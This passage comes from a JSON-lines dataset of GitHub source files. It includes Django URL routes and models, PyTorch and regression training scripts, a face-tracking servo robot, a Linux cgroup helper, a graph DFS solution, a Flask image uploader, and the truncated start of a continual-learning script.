消息管理\n\tpath('show_msg_num',msg_views.show_msg_num,name='show_msg_num'),\n\tpath('msg_center',msg_views.msg_center,name='msg_center'),\n\tpath('msg_list',msg_views.msg_list,name='msg_list'),\n\tpath('have_read_msg',msg_views.have_read_msg,name='have_read_msg'),\n\t# 管理员后台管理\n\tpath('org_user_config',main_user_views.org_user_config,name='org_user_config'),\n\tpath('main_user_list',main_user_views.main_user_list, name='main_user_list'),\n\tpath('add_main_user',main_user_views.add_main_user,name='add_main_user'),\n\tpath('update_main_user',main_user_views.update_main_user,name='update_main_user'),\n\tpath('change_pwd_main_user',main_user_views.change_pwd_main_user,name='change_pwd_main_user'),\n\t# 管理员组后台管理\n\tpath('user_group',user_group_view.user_group,name='user_group'),\n\tpath('group_list',user_group_view.group_list,name='group_list'),\n\tpath('add_user_to_group',user_group_view.add_user_to_group,name='add_user_to_group'),\n\tpath('remove_user_from_group',user_group_view.remove_user_from_group,name='remove_user_from_group'),\n\t# 归属管理\n\tpath('agency_config', agency_views.agency_config, name='agency_config'),\n\tpath('agency_user_config',agency_views.agency_user_config,name='agency_user_config'),\n\tpath('get_agency_group',agency_views.get_agency_group,name='get_agency_group'),\n\tpath('agency_group_config',agency_views.agency_group_config,name='agency_group_config'),\n\tpath('get_agency_tree', agency_views.get_agency_tree, name='get_agency_tree'),\n\tpath('get_agency_list', agency_views.get_agency_list, name='get_agency_list'),\n\tpath('add_agency',agency_views.add_agency,name='add_agency'),\n\tpath('update_agency',agency_views.update_agency,name='update_agency'),\n\tpath('get_allow_business',agency_views.get_allow_business,name='get_allow_business'),\n\t# 配置管理\n\tpath('fund_in_config',rule_views.fund_in_config,name='fund_in_config'),\n\tpath('get_org_tree',rule_views.get_org_tree,name='get_org_tree'),\n\tpath('get_global_fund_in',rule_views.get_global_fund_in,name='get_global_fund_in'),\n\tpath('add_fund_in',rule_views.add_fund_in,name='add_fund_in'),\n\tpath('get_global_fund_out',rule_views.get_global_fund_out,name='get_global_fund_out'),\n\tpath('add_fund_out',rule_views.add_fund_out,name='add_fund_out'),\n\tpath('fund_out_config',rule_views.fund_out_config,name='fund_out_config'),\n\tpath('exchange_config',rule_views.exchange_config,name='exchange_config'),\n\tpath('get_exchange_rule',rule_views.get_exchange_rule,name='get_exchange_rule'),\n\tpath('add_exchange_rule',rule_views.add_exchange_rule,name='add_exchange_rule'),\n\tpath('notional_principal_config',rule_views.notional_principal_config,name='notional_principal_config'),\n\tpath('get_notional_principal',rule_views.get_notional_principal,name='get_notional_principal'),\n\t# 客户管理\n\tpath('client_list',client_config_views.client_list,name='client_list'),\n\tpath('get_client_list',client_config_views.get_client_list,name='get_client_list'),\n\tpath('freeze_client',client_config_views.freeze_client,name='freeze_client'),\n\tpath('change_client_pwd',client_config_views.change_client_pwd,name='change_client_pwd'),\n\tpath('check_client',client_config_views.check_client,name='check_client'),\n\tpath('allow_business',client_config_views.allow_business,name='allow_business'),\n\t# 资金流水\n\tpath('funds_list',funds_views.funds_list,name='funds_list'),\n\tpath('fund_detail_list',funds_views.fund_detail_list,name='fund_detail_list'),\n\tpath('get_fund_audit',funds_views.get_fund_audit,name='get_fund_audit'),\n\tpath('fund_audit',funds_views.fund_audit,name='fund_audit'),\n\tpath('offline_balance_change',funds_views.offline_balance_change,name='offline_balance_change'),\n\t# 订单管理\n\tpath('order_list',order_views.order_list,name='order_list'),\n]\n","repo_name":"NorthAmerica/BusinessManagementSystem","sub_path":"bms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1923402272","text":"import torch\nimport torch.nn.functional as F\nimport pandas as pd\nimport numpy as np\nimport torch.utils.data as Data\nimport pickle\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import r2_score\nfrom sklearn.model_selection import train_test_split\nfrom IPython.display import clear_output\nfrom scipy.io import loadmat\n\n\nDEVICE = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nTRAIN = False\nPREDICT = True\nNET_FEATURES = 'mlp_6641x10_tanhout_10k_e-5_MSEsum_delsecsint'\nFILE_NAME = NET_FEATURES + '.pkl'\nfig_dir = '/home/adriano/Pictures/NN_model_Figures/'\n\n\nclass MLP(torch.nn.Module):\n def __init__(self, D_in, H, D_out):\n super(MLP, self).__init__()\n self.linear1 = torch.nn.Linear(D_in, H)\n self.linear2 = torch.nn.Linear(H, H)\n self.linear3 = torch.nn.Linear(H, H)\n self.linear4 = torch.nn.Linear(H, 2 * H)\n self.linear5 = torch.nn.Linear(2 * H, 4 * H)\n self.linear6 = torch.nn.Linear(4 * H, 2 * H)\n self.linear7 = torch.nn.Linear(2 * H, H)\n self.linear8 = torch.nn.Linear(H, H)\n self.linear9 = torch.nn.Linear(H, H)\n self.linear10 = torch.nn.Linear(H, D_out)\n self.to(DEVICE)\n\n def forward(self, x):\n x = self.linear1(x)\n x = self.linear2(F.relu(x))\n x = self.linear3(F.relu(x))\n x = self.linear4(F.relu(x))\n x = self.linear5(F.relu(x))\n x = self.linear6(F.relu(x))\n x = self.linear7(F.relu(x))\n x = self.linear8(F.relu(x))\n x = self.linear9(F.relu(x))\n y_pred = self.linear10(torch.tanh(x))\n return y_pred\n\n\nclass FullyConnectedNN(torch.nn.Module):\n def __init__(self, input_len, output_len, hidden_dim, depth):\n super(FullyConnectedNN, self).__init__()\n self.input_len = input_len\n self.output_len = output_len\n self.depth = depth\n self.hidden_dim = hidden_dim\n self.fc_layers = torch.nn.Sequential()\n\n for i in range(depth):\n in_features = self.input_len if i == 0 else self.hidden_dim\n self.fc_layers.add_module(f\"fc{i}\", torch.nn.Linear(in_features, self.hidden_dim))\n self.fc_layers.add_module(f\"relu{i}\", torch.nn.ReLU())\n\n self.classifier = torch.nn.Sequential(torch.nn.Linear(self.hidden_dim, self.output_len),\n torch.nn.Softmax(dim=1))\n self.to(DEVICE)\n # print number of parameters\n print(f\"Number of parameters: {sum(p.numel() for p in self.parameters() if p.requires_grad)}\")\n\n def forward(self, x):\n x = self.fc_layers(x.view(-1, self.input_len))\n x = self.classifier(x)\n return x\n\n\ndef train(model, epochs, train_loader, val_loader, log_interval, l_rate):\n model.to(DEVICE)\n criterion = torch.nn.MSELoss(reduction='sum')\n optimizer = torch.optim.Adam(model.parameters(), lr=l_rate)\n train_losses = []\n test_losses = []\n test_scores = []\n best_so_far = np.inf\n counter = 0\n for epoch in range(epochs):\n epoch_val_loss = 0\n train_loss = []\n for step, (batch_x, batch_y) in enumerate(train_loader):\n batch_x, batch_y = batch_x.to(DEVICE), batch_y.to(DEVICE)\n y_train_pred = model(batch_x)\n loss = criterion(y_train_pred, batch_y)\n train_loss.append(loss.item())\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n epoch_train_loss = np.sum(train_loss) / len(train_loader)\n train_losses.append(epoch_train_loss)\n model.eval()\n with torch.no_grad():\n y_true = []\n y_pred = []\n for step, (val_x, val_y) in enumerate(val_loader):\n val_x, val_y = val_x.to(DEVICE), val_y.to(DEVICE)\n val_pred = model(val_x)\n loss_val = criterion(val_pred, val_y)\n epoch_val_loss = (epoch_val_loss + loss_val) / len(val_loader)\n labels = torch.argmax(val_y, dim=1).view(-1, 1)\n predicted = torch.argmax(val_pred.data, 1).view(-1, 1)\n y_true.extend(labels.cpu().detach().numpy().tolist())\n y_pred.extend(predicted.cpu().detach().numpy().tolist())\n if epoch_val_loss < best_so_far:\n best_so_far = epoch_val_loss\n counter = 0\n else:\n counter += 1\n if counter > 20:\n clear_output(wait=True)\n\n # plot testing loss\n fig, ax = plt.subplots()\n ax.plot(test_losses, label='Testing Loss')\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Loss')\n ax.legend()\n\n # # plot average f1 score\n # fig, ax = plt.subplots()\n # ax.plot([score['macro avg']['f1-score'] for score in test_scores], label='Testing F1 Score Macro Avg')\n # ax.plot([score['macro avg']['precision'] for score in test_scores],\n # label='Testing Precision Score Macro Avg')\n # ax.plot([score['macro avg']['recall'] for score in test_scores], label='Testing Recall Score Macro Avg')\n # ax.set_xlabel('Epoch')\n # ax.set_ylabel('Score')\n # ax.legend()\n\n plt.show()\n\n # print(\n # f\"Epoch {epoch + 1}/{epochs}: Training Loss: {epoch_train_loss:.4f} Test Loss: {epoch_val_loss:.4f} \\nTest Score:\\n {test_score} \")\n break\n test_losses.append(epoch_val_loss.cpu().detach().numpy().tolist())\n print(\"Iteration: \", epoch, \" Loss: \", epoch_train_loss, \" Validation loss: \", epoch_val_loss)\n test_score = classification_report(y_true, y_pred, zero_division=0, output_dict=False)\n test_scores.append(classification_report(y_true, y_pred, zero_division=0, output_dict=True))\n\n model.train()\n\n if (epoch + 1) % log_interval == 0:\n clear_output(wait=True)\n\n # plot testing loss\n fig, ax = plt.subplots()\n ax.plot(test_losses, label='Testing Loss')\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Loss')\n ax.legend()\n\n # plot average f1 score\n fig, ax = plt.subplots()\n ax.plot([score['macro avg']['f1-score'] for score in test_scores], label='Testing F1 Score Macro Avg')\n ax.plot([score['macro avg']['precision'] for score in test_scores],\n label='Testing Precision Score Macro Avg')\n ax.plot([score['macro avg']['recall'] for score in test_scores], label='Testing Recall Score Macro Avg')\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Score')\n ax.legend()\n\n plt.show()\n\n # print(\n # f\"Epoch {epoch + 1}/{epochs}: Training Loss: {epoch_train_loss:.4f} Test Loss: {epoch_val_loss:.4f} \\nTest Score:\\n {test_score} \")\n\n# mat_data = loadmat('./data_error_force_delsecsint_norm.mat')\n# dataframe = pd.DataFrame(mat_data)\ndataframe = pd.read_pickle('./dataframe_normalized.pkl')\n\nX = dataframe[\"x\"]\nY = dataframe[\"y\"]\n# X = mat_data['x']\n# Y = mat_data['y']\ndata_x = X[0]\ndata_y = Y[0]\n\ntime = np.linspace(start=0, stop=60, num=data_x.shape[1])\nwindow_size = 1000\n\n# create training and validation set\nseed = 113\nX_tmp, X_test, y_tmp, y_test = train_test_split(np.transpose(data_x), np.transpose(data_y), test_size=0.2, shuffle=False)\nX_train, X_val, y_train, y_val = train_test_split(np.transpose(X_tmp), np.transpose(y_tmp), test_size=0.2, random_state=seed)\ntrain_dataset = Data.TensorDataset(torch.from_numpy(X_train).float(), torch.from_numpy(y_train).float())\nval_dataset = Data.TensorDataset(torch.from_numpy(X_val).float(), torch.from_numpy(y_val).float())\nbatch = 1000\ntrain_loader = Data.DataLoader(dataset=train_dataset, batch_size=batch, shuffle=True)\nval_loader = Data.DataLoader(dataset=val_dataset, batch_size=X_val.shape[0], shuffle=False)\n\nt_train = np.linspace(start=0, stop=time[len(X_tmp)], num=len(X_tmp))\nD_in, H, D_out = X_train.shape[1], 100, y_train.shape[1]\n\nif TRAIN:\n # initialize model and start training\n epochs = 10000\n model = MLP(D_in, H, D_out)\n train(model=model, epochs=epochs, train_loader=train_loader, val_loader=val_loader, log_interval=epochs,\n l_rate=1e-5)\n\n # save model\n pickle.dump(model, open(FILE_NAME, 'wb'))\n\nif PREDICT:\n # load model\n model = pickle.load(open(FILE_NAME, 'rb'))\n\n # # test metrics\n # r2_scores = np.empty(data_x.shape[0])\n # for i in range(data_x.shape[0]):\n # out_tensor = model(torch.from_numpy(data_x[i, -D_in:]).float().to(DEVICE))\n # out_vector = out_tensor.cpu().detach().numpy()\n # r2_scores[i] = r2_score(y_true=data_y[i, -D_out:], y_pred=out_vector)\n\n # see model predictions\n idx = np.random.randint(low=0, high=99)\n pred_tensor = model(torch.from_numpy(data_x[idx, -D_in:]).float().to(DEVICE))\n prediction = pred_tensor.cpu().detach().numpy()\n\n # plots\n plt_time = np.linspace(start=time[D_in], stop=60, num=len(prediction))\n fig_title = 'predicted vs actual force for experiment n: ' + str(idx)\n\n plt.figure(2)\n plt.plot(plt_time, prediction)\n plt.plot(plt_time, data_y[idx, -D_out:])\n plt.vlines(50, -0.2, 1.0, colors='r')\n plt.legend(['prediction', 'truth'])\n plt.xlabel(\"time\")\n plt.ylabel(\"force\")\n plt.grid()\n plt.title(fig_title)\n plt.savefig(fig_dir + NET_FEATURES + '_output_' + str(idx) + '.png')\n\n # plt.figure(3)\n # plt.plot(r2_scores)\n # plt.axhline(y = np.mean(r2_scores), color='r')\n # plt.xlabel(\"experiment n\")\n # plt.ylabel(\"r2 score\")\n # plt.grid()\n # plt.savefig(fig_dir + NET_FEATURES + '_r2score.png')\n\n plt.show()\n plt.close()\n\n# idx = np.random.randint(low=0, high=79)\n# X_prova = np.zeros(data_x.shape[1])\n# X_prova[:len(X_tmp)] = X_train[idx, :len(X_tmp)]\n#\n# plt.figure(1)\n# plt.plot(time, data_x[idx, :])\n# plt.plot(time, X_prova)\n# plt.grid()\n#\n# plt.show()\n","repo_name":"adrianoscibilia/human_control_modeling","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":10176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21726216497","text":"# Create your models here.\n\nfrom sre_constants import BRANCH\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\n\nBRANCH=[\n ('Computer Science and Engineering', 'CSE'),\n ('Mathematics and Computing', 'MNC'),\n ('Electrical and Electronics Engineering', 'EEE'),\n ('Electronics and Communication Engineering', 'ECE'),\n ('Mechanical Engineering', 'ME'),\n ('Engineering Physics', 'EP'),\n ('Data Science and Artificial Intelligence', 'DSAI'),\n ('Chemical Engineering', 'CL'),\n ('Chemical Science and Technology', 'CST'),\n ('Biosciences and Bioengineering', 'BSBE'),\n\n]\n\nYEAR=[\n ('2010', '2010'),\n ('2011', '2011'),\n ('2012', '2012'),\n ('2013', '2013'),\n ('2014', '2014'),\n ('2015', '2015'),\n ('2016', '2016'),\n ('2017', '2017'),\n ('2018', '2018'),\n ('2019', '2019'),\n ('2020', '2020'),\n ('2021', '2021'),\n ('2022', '2022'),\n ('2023', '2023')\n]\n\nPROGRAMME=[\n ('B. Tech.', 'B. Tech'),\n ('M. Tech.', 'M. Tech'),\n ('Ph. D.', 'Ph. D.')\n]\n\nclass UserProfile(models.Model):\n user=models.OneToOneField(User, on_delete=models.CASCADE)\n branch=models.CharField(blank=False, max_length=50 ,choices=BRANCH)\n graduation_year=models.CharField(blank=False, max_length=50, choices=YEAR)\n programme=models.CharField(blank=False, max_length=50, choices=PROGRAMME)\n linkedin=models.CharField(blank=True, max_length=200)\n github=models.CharField(blank=True, max_length=200)\n\n","repo_name":"suryansh1411/Placement-Helper","sub_path":"Placement-Helper/account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38960904071","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nclass Linear_Regression():\r\n\r\n def __init__(self):\r\n #reading the whole data into wine object\r\n self.wine = pd.read_csv('wine.csv')\r\n\r\n def linear_regression(self, xvalue, yvalue, title, xlabel, ylabel):\r\n y_bottom = 5\r\n y_top = 9\r\n y_range = y_top - y_bottom\r\n\r\n plt.ylim(y_bottom, y_top)\r\n #actual plotting of points, scatter plot\r\n plt.scatter(self.wine[xvalue], self.wine[yvalue])\r\n #regression line which is marked\r\n plt.plot(self.wine[xvalue], 0.5 * self.wine[xvalue] - 1.25 , label= title)\r\n\r\n #for plotting residual\r\n for i in range(0, len(self.wine)):\r\n # first we need the coordinates of the actual point\r\n x_point = self.wine[xvalue][i]\r\n y_point = self.wine[yvalue][i]\r\n # then we need the say how long is the vertical line\r\n # the vertical line must be between 0 and 1\r\n y1 = (y_point - y_bottom) / y_range # scale\r\n y2 = ((0.5 * x_point - 1.25) - y_bottom) / y_range # scale\r\n # now we can plot the vertical RED residual line\r\n plt.axvline(x_point, ymin=y1, ymax=y2, color=\"red\") \r\n\r\n plt.title(title)\r\n plt.xlabel(xlabel)\r\n plt.ylabel(ylabel)\r\n plt.grid()\r\n plt.show()\r\n \r\nlin_reg = Linear_Regression()\r\n#finding correlation coefficient\r\nlin_reg.linear_regression('AGST', 'Price', 'simple linear regression for temp and price', 'Temperature [Celsius]', 'Price')\r\n#in linear regression we can eliminate WinterRain and HarvestRain and Year when we want to decide the price\r\n#so not plotting the regression model for mentioned attributes. But including the screen shots\r\nlin_reg.linear_regression('WinterRain','Price', \"simple linear regression for WinterRain and price\", \"WinterRain\", \"Price\")\r\nlin_reg.linear_regression('HarvestRain','Price', \"simple linear regression for HarvestRain and price\", \"HarvestRain\", \"Price\")\r\nlin_reg.linear_regression('Age','Price', \"simple linear regression for Age and Price\", \"Age\", \"Price\")\r\nlin_reg.linear_regression('Year','Price', \"simple linear regression for Year and Price\", \"Year\", \"Price\")\r\n\r\n\r\n\r\n","repo_name":"amithmahakala423/Excel_Project","sub_path":"wine_linearregression.py","file_name":"wine_linearregression.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14375207916","text":"import numpy as np\nimport cv2 \nimport face_recognition\nfrom adafruit_servokit import ServoKit\nimport sys\nimport time\n\n\nclass robot:\n #inicializacion de servos y variables\n kit = ServoKit(channels=16)\n\n servo_base = kit.servo[0]\n servo_base_angle = 0\n servo_arm = kit.servo[1]\n servo_hand = kit.servo[2]\n hand_open = False\n\n drinks={'cola':60,'fanta':80,'ron':100,'ginebra':130}\n\n\n marge = 20\n def __init__(self):\n self.servo_base.angle=0\n self.servo_arm=0\n self.servo_hand=0\n #posicion de la cara respecto la camara\n def need_mov(self,w,locations):\n x = locations[3]+(locations[1]-locations[3])/2\n if x > w/2 +self.marge:\n return 'right'\n elif x< w/2 -self.marge:\n return 'left'\n else:\n return False\n\n #capar el movimiento de la base y guardar el angulo actual\n def move_base(self,angle):\n if angle >=180:\n self.servo_base_angle = 180\n self.servo_base.angle = self.servo_base_angle\n elif angle <=0:\n self.servo_base_angle = 0\n self.servo_base.angle = self.servo_base_angle\n else:\n self.servo_base_angle = angle\n self.servo_base.angle = self.servo_base_angle\n \n #extender brazo\n def open_arm(self):\n self.servo_arm.angle = 120\n\n #recoger brazo\n def close_arm(self):\n self.servo_arm.angle = 0\n\n #abrir mano\n def open_hand(self):\n self.servo_hand.angle = 0\n self.hand_open = True\n\n #cerrar mano\n def close_hand(self):\n self.servo_hand.angle = 85\n self.hand_open = False\n\n #movimiento de la base hasta que este centrada con la cara\n def move_base_facedet(self, face_state):\n time.sleep(2)\n if face_state == 'left':\n if (self.servo_base_angle + self.marge) <= 180:\n self.servo_base_angle += self.marge\n else:\n self.servo_base_angle = 180\n self.servo_base.angle = self.servo_base_angle\n elif face_state == 'right':\n if (self.servo_base_angle - self.marge) >= 0:\n self.servo_base_angle -= self.marge\n else:\n self.servo_base_angle = 0\n self.servo_base.angle = self.servo_base_angle\n\n\n #deteccion de rostros y movimiento de seguimiento\n def detect_faces(self):\n cap = cv2.VideoCapture(0)\n if not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n while True:\n # Captura de frames\n ret, frame = cap.read()\n height, width, _ = frame.shape\n if not ret:\n print(\"Can't receive frame. Exiting ...\")\n break\n frame = cv2.flip(frame,1)\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n face_locations = face_recognition.face_locations(frame_rgb)\n\n if face_locations:\n f_state = self.need_mov(width,face_locations[0])\n self.move_base_facedet(f_state)\n #marcar rectangulo en lasa caras\n top, right, bottom, left = face_locations[0]\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n #Marcar nomre abajo\n #podria contar con base de datos faciales\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, 'Persona', (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n cv2.imshow('imagen', frame)\n if cv2.waitKey(1) == ord('x'):\n break\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n\n def serve_order(self,ord_str):\n #coger baso vacio\n self.move_base(45)\n time.sleep(2)\n self.open_arm()\n time.sleep(2)\n self.close_hand()\n time.sleep(2)\n self.close_arm()\n time.sleep(2)\n #servir cada bebida pedida - grados predefinidos\n for order in ord_str.split(','):\n self.move_base(self.drinks[order])\n time.sleep(2)\n self.open_arm()\n time.sleep(2)\n self.close_arm()\n time.sleep(2)\n self.move_base(0)\n time.sleep(2)\n self.open_arm()\n time.sleep(2)\n detect_faces()\n\nrob = robot()\ntime.sleep(2)\nrob.serve_order(sys.argv[1])\n","repo_name":"OriolFeliu/Guabar","sub_path":"Code/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16805224795","text":"import logging, os\nimport error, utils\n\n# Global cache of all the cgroups and their associated mount points.\ncached_mounts = {}\n\n\ndef mount_point(subsystem):\n \"\"\"Get mount point for the cgroup hierarchy handling a particular subsystem.\n \"\"\"\n if subsystem not in cached_mounts:\n cached_mounts[subsystem] = ''\n for mounts in open('/proc/mounts').readlines():\n name, mount_pt, fs, options, junk = mounts.split(None, 4)\n if (fs == 'cgroup' and subsystem in options.split(',') or\n fs == 'cpuset' == subsystem):\n cached_mounts[subsystem] = mount_pt\n break\n\n if cached_mounts[subsystem] == '':\n # Error out if no mount_point found.\n raise error.Error('Could not find an associated mount point for '\n 'subsystem: %s' % subsystem)\n\n return cached_mounts[subsystem]\n\n\ndef my_container():\n \"\"\"Get current task's cgroup names, across all cgroup hierarchies.\"\"\"\n container = {} # maps cgroup-subsystems to mount-relative cgroup paths\n filename = '/proc/self/cgroup'\n if os.path.exists(filename):\n for hierarchy in open(filename).readlines():\n # eg 'number:oom,blockio,net,cpuacct,cpu,cpuset:/sys'\n junknum, subsystems, cgroup_name = hierarchy.split(':')\n cgroup_name = cgroup_name[1:-1] # strip leading / and newline\n for subsystem in subsystems.split(','):\n container[subsystem] = cgroup_name\n else:\n filename = '/proc/self/cpuset'\n cgroup_name = utils.read_one_line(filename)[1:] # strip leading /\n container['cpuset'] = cgroup_name\n return container\n\n\ndef root_cgroup(subsystem):\n \"\"\"Get an accessor to the root cgroup, with no subsystem.\"\"\"\n return cgroup(subsystem, '')\n\n\ndef cgroup(subsystem, name):\n \"\"\"Get a cgroup accessor for the subsystem for cgroup name.\"\"\"\n path = os.path.join(mount_point(subsystem), name)\n return cgroup_accessor(subsystem, path)\n\n\ndef subsystem_prefix(subsystem):\n \"\"\"Get qualifier for subsystem's attribute names.\"\"\"\n filename = os.path.join(mount_point('cpuset'), 'cpus')\n if subsystem == 'cpuset' and os.path.exists(filename):\n return '' # old non-cgroup style\n return subsystem + '.'\n\n\nclass cgroup_accessor(object):\n \"\"\"An accessor for data related to a cgroup.\n\n This class controls getting and putting attributes, and cgroup creation and\n destruction. This is the recommended abstraction for modifying cgroup\n settings.\n \"\"\"\n\n def __init__(self, subsystem, path):\n mount = mount_point(subsystem)\n self.subsystem = subsystem\n self.path = path\n self.name = path[len(mount)+1:]\n self.cpuset_hierarchy = mount == mount_point('cpuset')\n self.subsystem_prefix = subsystem_prefix(subsystem)\n\n\n def parent(self):\n \"\"\"Get the parent of this cgroup.\"\"\"\n return cgroup_accessor(self.subsystem, os.path.dirname(self.path))\n\n\n def child(self, name):\n \"\"\"Get the child of this cgroup that has the requested name.\"\"\"\n return cgroup_accessor(self.subsystem, os.path.join(self.path, name))\n\n\n def _attr_file(self, attr, prefix):\n \"\"\"Get the name of the file that stores the given attribute.\"\"\"\n if prefix == 'default':\n prefix = self.subsystem_prefix\n return os.path.join(self.path, prefix+attr)\n\n\n def get_attr(self, attr, prefix='default'):\n \"\"\"Get the value of a given cgorup attribute.\"\"\"\n filename = self._attr_file(attr, prefix)\n return [value.rstrip() for value in open(filename).readlines()]\n\n\n def put_attr(self, attr, values, prefix='default'):\n \"\"\"Set the value of a given cgorup attribute.\"\"\"\n filename = self._attr_file(attr, prefix)\n for value in values:\n utils.write_one_line(filename, value)\n\n\n def get_tasks(self):\n \"\"\"Get the value of the 'tasks' cgorup attribute.\"\"\"\n return self.get_attr('tasks', '')\n\n\n def put_tasks(self, tasks):\n \"\"\"Set the value of the 'tasks' cgroup attribute.\n\n This requires special handling because only one task can be added\n through the file interface at a time.\n\n Raises an exception if the task cannot be moved.\n \"\"\"\n for task in tasks:\n try:\n self.put_attr('tasks', [task], '')\n except Exception:\n if utils.pid_is_alive(task):\n raise # task exists but couldn't move it\n # task is gone or zombie so ignore this exception\n # also removes tasks from their current cgroup in same hierarchy\n logging.debug('Running pid %s in cgroup %s', ','.join(tasks), self.path)\n\n\n def move_my_task_here(self):\n \"\"\"Move the current task to this cgroup.\n\n Raises an exception if the task cannot be moved.\n \"\"\"\n self.put_tasks([str(os.getpid())])\n\n\n def release(self):\n \"\"\"Destroy this cgroup.\n\n Destroy the cgroup and transfers all surviving tasks to this cgroup's\n parent.\n \"\"\"\n if os.path.exists(self.path):\n # Transfer any survivor tasks (e.g. me) to parent\n self.parent().put_tasks(self.get_tasks())\n\n # remove the now-empty outermost cgroup of this subtree\n os.rmdir(self.path)\n logging.debug('Deleted cgroup %s', self.path)\n","repo_name":"google/blkcgroup","sub_path":"cgroup.py","file_name":"cgroup.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"41682799406","text":"import sys\nfrom collections import defaultdict\nsys.setrecursionlimit(10**9)\nsys.stdin = open(\"9_input.txt\",\"r\")\n\ndef dfs(start) :\n cnt = 0\n for next in path[start] :\n if A[next] == '1' :\n cnt += 1\n else :\n if not visited[next] :\n visited[next] = True\n cnt += dfs(next)\n return cnt\n \nn = int(input())\nA = ' ' + sys.stdin.readline().strip() # 정점의 실내/실외 정보를 담은 문자열. index와 정점번호를 맞춰주기 위해 공백 한 칸(' ')을 앞에 붙여줌\npath = [[] for _ in range(n+1)] \nvisited = [False] * (n+1)\nans = 0\n\nfor _ in range(n-1) :\n start, end = map(int, sys.stdin.readline().strip().split())\n path[start].append(end)\n path[end].append(start)\n\nfor i in range(1, n+1) :\n if A[i] == '1' :\n for j in path[i] :\n if A[j] == '1' :\n ans += 1\n else :\n if not visited[i] :\n visited[i] = True\n cnt = dfs(i)\n ans += cnt *(cnt-1) # n개중 2개를 뽑고 순서가 있다면 nP2 = n(n-1)\n\nprint(ans)\n\n","repo_name":"choidabom/week03_Team2","sub_path":"21606/21606_mgs.py","file_name":"21606_mgs.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70443776465","text":"from flask import Blueprint, render_template, request\nfrom functions import *\nimport logging\n\nlogging.basicConfig(filename=\"./basic.log\", level=logging.INFO)\n\n\nloader_blueprint = Blueprint('loader_blueprint', __name__, template_folder=\"templates\")\n\n@loader_blueprint.route(\"/post\", methods=['GET'])\ndef loader_page():\n return render_template(\"post_form.html\")\n\n@loader_blueprint.route(\"/post\", methods=['POST'])\ndef page_upload():\n \"\"\" Эта вьюшка обрабатывает форму, вытаскивает из запроса файл и показывает его имя\"\"\"\n\n # Получаем объект картинки и текст из формы\n picture = request.files.get(\"picture\", None)\n content = request.form.get(\"content\", '')\n\n filename = picture.filename # Получаем имя файла у загруженного файла\n\n ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\n extension = filename.split(\".\")[-1] # Получаем расширение файла\n if extension in ALLOWED_EXTENSIONS: # Если расширение файла в белом списке\n # Сохраняем картинку под родным именем в папку uploads\n picture.save(f\"./uploads/{filename}\")\n else:\n logging.info(\"Loading file - no picture\")\n return f\"Тип файлов {extension} не поддерживается\"\n pict = f\"/uploads/{filename}\"\n save_json(pict, content) # Запись JSON-файла\n return render_template(\"post_uploaded.html\", picture=pict, content=content)\n","repo_name":"artemskav/PyHW12","sub_path":"loader/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12245553667","text":"import torch\nimport random\nimport argparse\nfrom dataloaders import loader\nimport learners\nimport dataloaders\nimport numpy as np\nfrom dataloaders.utils import *\nfrom torch.utils.data import DataLoader\n\ndef run(args):\n seed = args.seed\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic=True\n\n if args.dataset == 'CIFAR10':\n Dataset = dataloaders.CIFAR10\n num_classes = 10\n elif args.dataset == 'CIFAR100':\n Dataset = dataloaders.CIFAR100\n num_classes = 100\n else:\n print('Dataset does not select.')\n exit()\n\n # load tasks\n class_order = np.arange(num_classes).tolist()\n class_order_logits = np.arange(num_classes).tolist()\n if seed > 0 and args.rand_split:\n random.seed(seed)\n random.shuffle(class_order)\n\n tasks = []\n tasks_logits = []\n p = 0\n first_split_size = 5\n other_split_size = 5\n\n while p < num_classes:\n inc = other_split_size if p > 0 else first_split_size\n tasks.append(class_order[p:p+inc])\n tasks_logits.append(class_order_logits[p:p+inc])\n p += inc\n num_tasks = len(tasks)\n task_names = [str(i+1) for i in range(num_tasks)]\n\n # datasets and dataloaders\n train_transform = dataloaders.utils.get_transform(dataset=args.dataset)\n test_transform = dataloaders.utils.get_transform(dataset=args.dataset)\n \n train_dataset = Dataset(args.dataroot, 